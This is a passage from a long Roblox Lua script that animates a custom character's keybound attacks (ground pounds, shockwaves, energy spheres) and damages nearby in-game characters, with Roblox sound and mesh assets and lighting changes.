  4322. hit:FindFirstChild("Torso").Velocity = hit:FindFirstChild("Torso").CFrame.lookVector * -70
  4323. --Debounces.Slashed = false
  4324. --end
  4325. end
  4326. end
  4327. end
  4328. end)
  4329. for i = 1, 8 do
  4330. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)), 0.3)
  4331. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,0)*CFrame.Angles(math.rad(-50),math.rad(0),math.rad(-20)), 0.3)
  4332. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,.2)*CFrame.Angles(math.rad(8),math.rad(0),0), 0.3)
  4333. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(math.rad(16), math.rad(0), 0), 0.3)
  4334. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(math.rad(-16), math.rad(0), math.rad(0)), 0.3)
  4335. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2.6, -1.4) * CFrame.Angles(math.rad(60), math.rad(0), math.rad(0)), 0.3)
  4336. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  4337. if Debounces.on == false then break end
  4338. rs:wait(.7)
  4339. end
  4340. kik:disconnect()
  4341. if Debounces.CanAttack == false then
  4342. Debounces.CanAttack = true
  4343. Debounces.on = false
  4344. Debounces.NoIdl = false
  4345. end
  4346. end
  4347. end
  4348. end)
  4349. ----------------------------------------------------
  4350. mouse.KeyDown:connect(function(key)
  4351. if key == "c" then
  4352. if Debounces.CanAttack == true then
  4353. Debounces.CanAttack = false
  4354. Debounces.NoIdl = true
  4355. Debounces.on = true
  4356. SIDZ = {"231917744", "231917742"}
  4357. PTZ = {0.7, 0.8, 0.9, 1}
  4358. for i = 1, 20 do
  4359. wait()
  4360. for i,v in pairs(char.Absolution:children()) do
  4361. if v:IsA("Part") or v:IsA("WedgePart") then
  4362. v.Transparency = v.Transparency + 0.05
  4363. end
  4364. end
  4365. end
  4366. function FindNearestTorso(Position,Distance,SinglePlayer)
  4367. if SinglePlayer then return(SinglePlayer.Torso.CFrame.p -Position).magnitude < Distance end
  4368. local List = {}
  4369. for i,v in pairs(workspace:GetChildren())do
  4370. if v:IsA("Model")then
  4371. if v:findFirstChild("Torso")then
  4372. if v ~= char then
  4373. if(v.Torso.Position -Position).magnitude <= Distance then
  4374. table.insert(List,v)
  4375. end
  4376. end
  4377. end
  4378. end
  4379. end
  4380. return List
  4381. end
  4382. GroundPound()
  4383. for i = 1, 11 do
  4384. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.4)
  4385. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)), 0.4)
  4386. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0), 0.3)
  4387. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.2, 0) * CFrame.Angles(math.rad(-80), math.rad(-20), 0), 0.3)
  4388. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -2, -.4) * CFrame.Angles(math.rad(80), 0, math.rad(-30)), 0.3)
  4389. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -2, -1) * CFrame.Angles(math.rad(80), 0, math.rad(10)), 0.3)
  4390. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  4391. if Debounces.on == false then break end
  4392. rs:wait(1.4)
  4393. end
  4394. GroundPound()
  4395. for i = 1, 11 do
  4396. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)), 0.4)
  4397. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.4)
  4398. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0), 0.3)
  4399. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.2, 0) * CFrame.Angles(math.rad(-80), math.rad(20), 0), 0.3)
  4400. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -2, -1) * CFrame.Angles(math.rad(80), 0, math.rad(10)), 0.3)
  4401. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -2, -.4) * CFrame.Angles(math.rad(80), 0, math.rad(30)), 0.3)
  4402. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  4403. if Debounces.on == false then break end
  4404. rs:wait(1.4)
  4405. end
  4406. GroundPound()
  4407. for i = 1, 11 do
  4408. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.4)
  4409. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)), 0.4)
  4410. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0), 0.3)
  4411. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.2, 0) * CFrame.Angles(math.rad(-80), math.rad(-20), 0), 0.3)
  4412. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -2, -.4) * CFrame.Angles(math.rad(80), 0, math.rad(-30)), 0.3)
  4413. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -2, -1) * CFrame.Angles(math.rad(80), 0, math.rad(10)), 0.3)
  4414. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  4415. if Debounces.on == false then break end
  4416. rs:wait(1.4)
  4417. end
  4418. GroundPound()
  4419. for i = 1, 11 do
  4420. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)), 0.4)
  4421. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.4)
  4422. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0), 0.3)
  4423. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.2, 0) * CFrame.Angles(math.rad(-80), math.rad(20), 0), 0.3)
  4424. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -2, -1) * CFrame.Angles(math.rad(80), 0, math.rad(10)), 0.3)
  4425. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -2, -.4) * CFrame.Angles(math.rad(80), 0, math.rad(30)), 0.3)
  4426. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  4427. if Debounces.on == false then break end
  4428. rs:wait(1.4)
  4429. end
  4430. GroundPound()
  4431. for i = 1, 11 do
  4432. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)), 0.4)
  4433. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)), 0.4)
  4434. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0), 0.3)
  4435. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.2, 0) * CFrame.Angles(math.rad(-80), math.rad(-20), 0), 0.3)
  4436. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -2, -.4) * CFrame.Angles(math.rad(80), 0, math.rad(-30)), 0.3)
  4437. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -2, -1) * CFrame.Angles(math.rad(80), 0, math.rad(10)), 0.3)
  4438. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  4439. if Debounces.on == false then break end
  4440. rs:wait(1.4)
  4441. end
  4442. GroundPound()
  4443. for i = 1, 11 do
  4444. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)), 0.4)
  4445. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.4)
  4446. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0), 0.3)
  4447. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.2, 0) * CFrame.Angles(math.rad(-80), math.rad(20), 0), 0.3)
  4448. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -2, -1) * CFrame.Angles(math.rad(80), 0, math.rad(10)), 0.3)
  4449. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -2, -.4) * CFrame.Angles(math.rad(80), 0, math.rad(30)), 0.3)
  4450. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  4451. if Debounces.on == false then break end
  4452. rs:wait(1.4)
  4453. end
  4454. for i = 1, 24 do
  4455. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.4, 2.4, 0)*CFrame.Angles(math.rad(170),math.rad(0),math.rad(-10)), 0.2)
  4456. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.4, 2.4, 0)*CFrame.Angles(math.rad(170),math.rad(0),math.rad(10)), 0.2)
  4457. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, .2)*CFrame.Angles(math.rad(16),math.rad(0),0), 0.2)
  4458. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 2, 0) * CFrame.Angles(math.rad(20), math.rad(0), 0), 0.2)
  4459. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4460. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2, -1.4) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4461. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.5, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  4462. if Debounces.on == false then break end
  4463. rs:wait(3)
  4464. end
  4465. for i,v in pairs(FindNearestTorso(torso.CFrame.p,25))do
  4466. if v:FindFirstChild('Humanoid') then
  4467. v.Humanoid:TakeDamage(math.random(99999999,99999999))
  4468. v.Humanoid.PlatformStand = true
  4469. v:FindFirstChild("Torso").Velocity = hed.CFrame.lookVector * 100
  4470. end
  4471. end
  4472. x = Instance.new("Sound",char)
  4473. x.SoundId = "rbxassetid://"..SIDZ[math.random(1,#SIDZ)]
  4474. x.Pitch = PTZ[math.random(1,#PTZ)]
  4475. x.Volume = 1
  4476. wait(0.1)
  4477. x:Play()
  4478. Crater(hed,20)
  4479. for i = 1, 20 do
  4480. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.4, 3.2, -.5)*CFrame.Angles(math.rad(160),math.rad(0),math.rad(-10)), 0.6)
  4481. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.4, 3.2, -.5)*CFrame.Angles(math.rad(160),math.rad(0),math.rad(10)), 0.6)
  4482. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, .2)*CFrame.Angles(math.rad(16),math.rad(0),0), 0.6)
  4483. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -5, 0) * CFrame.Angles(math.rad(-90), math.rad(0), 0), 0.6)
  4484. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, .4) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.6)
  4485. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2, .4) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.6)
  4486. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.5, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  4487. if Debounces.on == false then break end
  4488. rs:wait(2)
  4489. end
  4490. if Debounces.CanAttack == false then
  4491. Debounces.CanAttack = true
  4492. Debounces.on = false
  4493. Debounces.NoIdl = false
  4494. for i = 1, 20 do
  4495. wait()
  4496. for i,v in pairs(char.Absolution:children()) do
  4497. if v:IsA("Part") or v:IsA("WedgePart") then
  4498. v.Transparency = v.Transparency - 0.05
  4499. end
  4500. end
  4501. end
  4502. end
  4503. end
  4504. end
  4505. end)
  4506. ----------------------------------------------------176349813
  4507. mouse.KeyDown:connect(function(key)
  4508. if key == "b" then
  4509. hum.WalkSpeed = 0.01
  4510. if Debounces.CanAttack == true then
  4511. Debounces.CanAttack = false
  4512. Debounces.NoIdl = true
  4513. Debounces.on = true
  4514. for i = 1, 30 do
  4515. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.4, 2.4, 0)*CFrame.Angles(math.rad(170),math.rad(0),math.rad(-34)), 0.2)
  4516. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.4, 2.4, 0)*CFrame.Angles(math.rad(170),math.rad(0),math.rad(34)), 0.2)
  4517. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, .2)*CFrame.Angles(math.rad(16),math.rad(0),0), 0.2)
  4518. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(math.rad(20), math.rad(0), 0), 0.2)
  4519. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4520. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2, -1.4) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4521. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.5, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  4522. if Debounces.on == false then break end
  4523. rs:wait(6)
  4524. end
  4525. v = Instance.new("Sound")
  4526. v.SoundId = "rbxassetid://181384451"
  4527. v.Parent = char
  4528. v.Looped = false
  4529. v.Pitch = .94
  4530. v.Volume = 1
  4531. wait(.01)
  4532. v:Play()
  4533.  
  4534. if Daytime == true then
  4535. Daytime = false
  4536. l.TimeOfDay = 24
  4537. else
  4538. Daytime = true
  4539. l.TimeOfDay = 12
  4540. l.OutdoorAmbient = Color3.new(0.498039, 0.498039, 0.498039)
  4541. end
  4542.  
  4543. local Shockwave = function()
  4544. local rng1 = Instance.new("Part", char)
  4545. rng1.Anchored = true
  4546. rng1.BrickColor = BrickColor.new("Really black")
  4547. rng1.CanCollide = false
  4548. rng1.FormFactor = 3
  4549. rng1.Name = "Ring"
  4550. rng1.Size = Vector3.new(1, 1, 1)
  4551. rng1.Transparency = 0.35
  4552. rng1.TopSurface = 0
  4553. rng1.BottomSurface = 0
  4554. local rngm1 = Instance.new("SpecialMesh", rng)
  4555. rngm1.MeshId = "http://www.roblox.com/asset/?id=3270017"
  4556. rngm1.Scale = Vector3.new(10, 10, 1)
  4557. rng1.CFrame = CFrame.new(0, -2, 0) * CFrame.Angles(0, 0, 0)
  4558. local Wave = Instance.new("Part", game.Workspace--[[?]])
  4559. Wave.Name = "Shockwave"
  4560. Wave.BrickColor = BrickColor.new("Really black")
  4561. Wave.Size = Vector3.new(1, 1, 1)
  4562. Wave.Shape = "Ball"
  4563. Wave.CanCollide = false
  4564. Wave.Anchored = true
  4565. Wave.TopSurface = 0
  4566. Wave.BottomSurface = 0
  4567. Wave.Touched:connect(function(hit)
  4568. if hit.Parent:findFirstChild("Humanoid") and hit.Parent:findFirstChild("Torso") then
  4569. local Occlude = true
  4570. local NotOccludes = {
  4571. char.Name;
  4572. "Wings";
  4573. "Scythe";
  4574. "Thingy";
  4575. "Thingy2"; -- put all of the names in a table pls
  4576. }
  4577. for i,v in pairs(NotOccludes) do
  4578. if hit.Parent.Name == v then
  4579. Occlude = false
  4580. end
  4581. end
  4582. --if hit.Parent.Name ~= char.Name and hit.Name ~= "Wings" and hit.Name ~= "Scythe" and hit.Name ~= "Thingy" and hit.Name ~= "Thingy2" and hit.Parent.Name ~= "Wings" and hit.Parent.Name ~= "Scythe" and hit.Parent.Name ~= "Thingy" and hit.Parent.Name ~= "Thingy2" then
  4583. if Occlude then
  4584. hit.Parent:findFirstChild("Humanoid").Health = hit.Parent:findFirstChild("Humanoid").Health - 1
  4585. hit.Parent:findFirstChild("Torso").Velocity = hit.Parent:findFirstChild("Torso").CFrame.lookVector * -120
  4586. end
  4587. end
  4588. end)
  4589.  
  4590. Instance.new("SpecialMesh", Wave).MeshType = "Sphere"
  4591.  
  4592. coroutine.wrap(function()
  4593. for i = 1, 20, 0.2 do
  4594. rngm1.Scale = Vector3.new(10 + i*2, 10 + i*2, 1)
  4595. rng1.Transparency = i/20
  4596. wait()
  4597. end
  4598. wait()
  4599. rng1:Destroy()
  4600. end)()
  4601.  
  4602. Delay(0, function()
  4603.  
  4604. if Daytime == false then
  4605. for i = 1, 50, 1 do
  4606. Wave.Size = Vector3.new(1 + i, 1 + i, 1 + i)
  4607. Wave.CFrame = char.Torso.CFrame
  4608. local t = i / 50
  4609. Wave.Transparency = t
  4610. wait()
  4611. end
  4612. else
  4613. for i = 1, 50, 1 do
  4614. Wave.Size = Vector3.new(1 + i, 1 + i, 1 + i)
  4615. Wave.CFrame = char.Torso.CFrame
  4616. local t = i / 50
  4617. Wave.Transparency = t
  4618. wait()
  4619. end
  4620. end
  4621. Wave:Destroy()
  4622. end)
  4623. Delay(0, function()
  4624. while wait() do
  4625. if Wave ~= nil then
  4626. Wave.CFrame = char.Torso.CFrame
  4627. else
  4628. break
  4629. end
  4630. end
  4631. end)
  4632. end
  4633. Shockwave()
  4634. for i = 1, 30 do
  4635. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, 0)*CFrame.Angles(math.rad(20),math.rad(0), math.rad(0)),0.3)
  4636. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.6, 0) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.3)
  4637. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, 0.9, .4)*CFrame.Angles(math.rad(-50),math.rad(0),math.rad(28)), 0.3)
  4638. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, 0.9, .4)*CFrame.Angles(math.rad(-50),math.rad(0),math.rad(-28)), 0.3)
  4639. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0)), 0.2)
  4640. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3.2, .3) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4641. if Debounces.on == false then break end
  4642. rs:wait()
  4643. end
  4644. wait(2.4)
  4645. Debounces.NoIdl = false
  4646. hum.WalkSpeed = 5
  4647. Debounces.on = false
  4648. wait()
  4649. if Debounces.CanAttack == false then
  4650. Debounces.CanAttack = true
  4651. v:Destroy()
  4652. end
  4653. end
  4654. end
  4655. end)
  4656. ----------------------------------------------------
  4657. mouse.KeyDown:connect(function(key)
  4658. if key == "l" then
  4659. for i = 1, 20 do
  4660. wait()
  4661. for i,v in pairs(char.Absolution:children()) do
  4662. if v:IsA("Part") or v:IsA("WedgePart") then
  4663. v.Transparency = v.Transparency + 0.05
  4664. end
  4665. end
  4666. end
  4667. if Debounces.CanAttack == true then
  4668. Debounces.CanAttack = false
  4669. Debounces.NoIdl = true
  4670. Debounces.on = true
  4671. bv = Instance.new("BodyVelocity",torso)
  4672. bv.maxForce = Vector3.new(0,200000,0)
  4673. bv.P = 100000
  4674. bv.velocity = Vector3.new(0,500,0)
  4675. wait(2)
  4676. bv:Destroy()
  4677. if (torso.Velocity*Vector3.new(1, 1, 1)).magnitude > 1 then
  4678. for i = 1, 20 do
  4679. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, 0)*CFrame.Angles(math.rad(-14),math.rad(0), math.rad(0)),0.3)
  4680. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.6, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0)), 0.3)
  4681. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.5, .9, -.5) * CFrame.Angles(math.rad(90), math.rad(0), math.rad(40)), 0.3)
  4682. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.5, .9, -.5) * CFrame.Angles(math.rad(90), math.rad(0), math.rad(-40)), 0.3)
  4683. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -1.5, -1) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4684. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -1.5, -1) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  4685. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.85, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  4686. if Debounces.on == false then break end
  4687. wait()
  4688. end
  4689. for i = 1, 360, 20 do wait()
  4690. torso.Weld.C1 = CFrame.new(0,0,0) * CFrame.Angles(math.rad(i),0,0)
  4691. end
  4692. end
  4693. torso.Weld.C1 = CFrame.new(0,-1.2,0)
  4694. local ry,ht,ps=nil,nil,nil
  4695. while ht==nil do
  4696. ry,ht,ps=newRay(root.CFrame*CFrame.new(0,-2,0),root.CFrame*CFrame.new(0,-3,0),4.1,{char})
  4697. wait()
  4698. end
  4699. z = Instance.new("Sound",char)
  4700. z.SoundId = "rbxassetid://245537790"
  4701. z.Pitch = 1
  4702. z.Volume = 1
  4703. wait(0.1)
  4704. z:Play()
  4705. local sp = Instance.new("Part", char)
  4706. sp.Name = "Energy"
  4707. sp.BrickColor = BrickColor.new("Really black")
  4708. sp.Size = Vector3.new(1, 1, 1)
  4709. sp.Shape = "Ball"
  4710. sp.CanCollide = false
  4711. sp.Anchored = true
  4712. sp.TopSurface = 0
  4713. sp.BottomSurface = 0
  4714. local spm = Instance.new("SpecialMesh",sp)
  4715. spm.MeshId = "rbxassetid://9982590"
  4716. spm.Scale = Vector3.new(3,3,3)
  4717. local sp2 = Instance.new("Part", char)
  4718. sp2.Name = "Energy2"
  4719. sp2.BrickColor = BrickColor.new("Really black")
  4720. sp2.Size = Vector3.new(1, 1, 1)
  4721. sp2.Shape = "Ball"
  4722. sp2.CanCollide = false
  4723. sp2.Anchored = true
  4724. sp2.TopSurface = 0
  4725. sp2.BottomSurface = 0
  4726. local spm2 = Instance.new("SpecialMesh",sp2)
  4727. spm2.MeshId = "rbxassetid://9982590"
  4728. spm2.Scale = Vector3.new(3,3,3)
  4729. sp.Touched:connect(function(hit)
  4730. if hit.Parent:findFirstChild("Humanoid") and hit.Parent:findFirstChild("Torso") then
  4731. local Occlude = true
  4732. local NotOccludes = {
  4733. char.Name;
  4734. "Wings";
  4735. "Scythe";
  4736. "Thingy";
  4737. "Thingy2"; -- put all of the names in a table pls
  4738. }
  4739. for i,v in pairs(NotOccludes) do
  4740. if hit.Parent.Name == v then
  4741. Occlude = false
  4742. end
  4743. end
  4744. --if hit.Parent.Name ~= char.Name and hit.Name ~= "Wings" and hit.Name ~= "Scythe" and hit.Name ~= "Thingy" and hit.Name ~= "Thingy2" and hit.Parent.Name ~= "Wings" and hit.Parent.Name ~= "Scythe" and hit.Parent.Name ~= "Thingy" and hit.Parent.Name ~= "Thingy2" then
  4745. if Occlude then
  4746. hit.Parent:findFirstChild("Humanoid").Health = hit.Parent:findFirstChild("Humanoid").Health - 80
  4747. hit.Parent:findFirstChild("Torso").Velocity = hit.Parent:findFirstChild("Torso").CFrame.lookVector * -120
  4748. end
  4749. end
  4750. end)
  4751. sp2.Touched:connect(function(hit)
  4752. if hit.Parent:findFirstChild("Humanoid") and hit.Parent:findFirstChild("Torso") then
  4753. local Occlude = true
  4754. local NotOccludes = {
  4755. char.Name;
  4756. "Wings";
  4757. "Scythe";
  4758. "Thingy";
  4759. "Thingy2"; -- put all of the names in a table pls
  4760. }
  4761. for i,v in pairs(NotOccludes) do
  4762. if hit.Parent.Name == v then
  4763. Occlude = false
  4764. end
  4765. end
  4766. --if hit.Parent.Name ~= char.Name and hit.Name ~= "Wings" and hit.Name ~= "Scythe" and hit.Name ~= "Thingy" and hit.Name ~= "Thingy2" and hit.Parent.Name ~= "Wings" and hit.Parent.Name ~= "Scythe" and hit.Parent.Name ~= "Thingy" and hit.Parent.Name ~= "Thingy2" then
  4767. if Occlude then
  4768. hit.Parent:findFirstChild("Humanoid").Health = hit.Parent:findFirstChild("Humanoid").Health - 1
  4769. hit.Parent:findFirstChild("Torso").Velocity = hit.Parent:findFirstChild("Torso").CFrame.lookVector * -120
  4770. end
  4771. end
  4772. end)
  4773. for i = 1, 100, 1 do
  4774. sp.Size = Vector3.new(1 + i, 1 + i, 1 + i)
  4775. sp2.Size = Vector3.new(1 + i, 1 + i, 1 + i)
  4776. sp.CFrame = root.CFrame * CFrame.new(0,0,0) * CFrame.Angles(math.rad(i), math.rad(i), math.rad(-i))
  4777. sp2.CFrame = root.CFrame * CFrame.new(0,0,0) * CFrame.Angles(math.rad(-i), math.rad(-i), math.rad(i))
  4778. spm.Scale = sp.Size
  4779. spm2.Scale = sp2.Size
  4780. local t = i / 100
  4781. sp.Transparency = t
  4782. sp2.Transparency = t
  4783. wait()
  4784. end
  4785. sp:Destroy()
  4786. sp2:Destroy()
  4787. z:Destroy()
  4788. for i = 1, 20 do
  4789. wait()
  4790. for i,v in pairs(char.Absolution:children()) do
  4791. if v:IsA("Part") or v:IsA("WedgePart") then
  4792. v.Transparency = v.Transparency - 0.05
  4793. end
  4794. end
  4795. end
  4796. if Debounces.CanAttack == false then
  4797. Debounces.CanAttack = true
  4798. Debounces.NoIdl = false
  4799. Debounces.on = false
  4800. end
  4801. end
  4802. end
  4803. end)
  4804. ----------------------------------------------------
  4805. local orbt={}
  4806. local stlt={}
  4807. local chot={}
  4808. local cfxt={}
  4809. local pfxt={}
  4810. local cns=0
  4811. local cnOrb=nil
  4812. mouse.KeyDown:connect(function(key)
  4813. if key == "u" then
  4814. if Debounces.CanAttack == true then
  4815. Debounces.CanAttack = false
  4816. Debounces.NoIdl = true
  4817. Debounces.on = true
  4818. orbt={}
  4819. stlt={}
  4820. chot={}
  4821. cfxt={}
  4822. for i = 1, 20 do
  4823. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(70),math.rad(0),math.rad(30)), 0.2)
  4824. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,1.4,0)*CFrame.Angles(math.rad(170),math.rad(-20),math.rad(-30)), 0.2)
  4825. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0)*CFrame.Angles(math.rad(0),math.rad(-40),0), 0.2)
  4826. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(40), 0), 0.2)
  4827. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.15, -3, 0.4) * CFrame.Angles(math.rad(-20), math.rad(20), math.rad(-10)), 0.2)
  4828. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.15, -3, -0.4) * CFrame.Angles(math.rad(20), math.rad(-10), math.rad(10)), 0.2)
  4829. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.85, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  4830. if Debounces.on == false then end
  4831. rs:wait()
  4832. end
  4833. z = Instance.new("Sound",char)
  4834. z.SoundId = "rbxassetid://170053944"
  4835. z.Pitch = 1.07
  4836. z.Volume = 1
  4837. wait(0.1)
  4838. z:Play()
